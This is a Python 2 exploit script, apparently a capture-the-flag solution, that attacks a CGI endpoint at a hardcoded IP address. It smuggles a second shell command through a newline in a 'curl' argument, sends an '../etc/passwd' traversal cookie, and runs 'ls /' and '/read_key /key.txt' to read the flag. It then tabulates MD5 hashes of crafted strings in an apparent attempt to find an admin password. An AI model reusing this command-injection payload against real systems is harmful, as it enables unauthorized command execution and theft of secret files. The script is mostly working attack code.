import requests

headers = dict()
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {"diagsess":"../etc/passwd"} # doesn't matter
cmd =" ls /"
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers)
print r.content[r.content.find(">xxx")+4:]

cmd = "/read_key /key.txt"
# or use python to read stderr
# cmd = "python -c s=__import__('subprocess');print(s.check_output('/read_key'+chr(32)+'/key.txt',stderr=s.STDOUT,shell=True))"
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers)
print r.content[r.content.find(">xxx")+4:]

# BTW, attempts to find an admin password
# from http://calebmadrigal.com/display-list-as-table-in-ipython-notebook/
class ListTable(list):
    """ Overridden list class which takes a 2-dimensional list of 
        the form [[1,2,3],[4,5,6]], and renders an HTML Table in 
        IPython Notebook. """
    
    def _repr_html_(self):
        html = ["<table>"]
        for row in self:
            html.append("<tr>")            
            html.extend("<td>{0}</td>".format(col) for col in row)            
            html.append("</tr>")
        html.append("</table>")
        return ''.join(html)
    
from hashlib import md5
L =[  "djGFYmi", "ZkjAFaaaa", 
          "G/I2/vILur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
         "Vf3ppC4Iu74AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
        "6Za/F6+mur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA= ".decode("base64"),       
         'Kdr.b4v', 'K1UgX15KGWDJKTdo', 'xIoN=JG', 'http://weijr-eng.blogspot.com               GE\x00\x00\x0f\xe5\xef\x0b']
L+=[ 'b81.org/kpoz&AV' , 'b81.org/GD9FD&Sa', 'b81.org/S27Mp1Ya', 'http://weijr-eng.blogspot.com               \xbf\x13\x00\x00\xbd\xae\xcb`']
L+=['http://weijr-eng.blogspot.com               \xcb<\x00\x00\xf9\xc8P\xd4', 'http://weijr-eng.blogspot.com               \x97\xa1\x00\x00T3z\x0c']
S = sorted( (md5(x).hexdigest(), x) for x in L )
ListTable([['Leading 0 or f', 'md5 hexdigest', 'plaintext']]+[[[i for i in range(len(s[0])-1) if s[0][i]!=s[0][i+1]][0]+1, s[0], repr(s[1])] for s in S])

with open('md5low','w') as f:
    f.write('http://weijr-eng.blogspot.com               \xcb<\x00\x00\xf9\xc8P\xd4')
with open('md5high', 'w') as f:
    f.write('http://weijr-eng.blogspot.com               \x97\xa1\x00\x00T3z\x0c')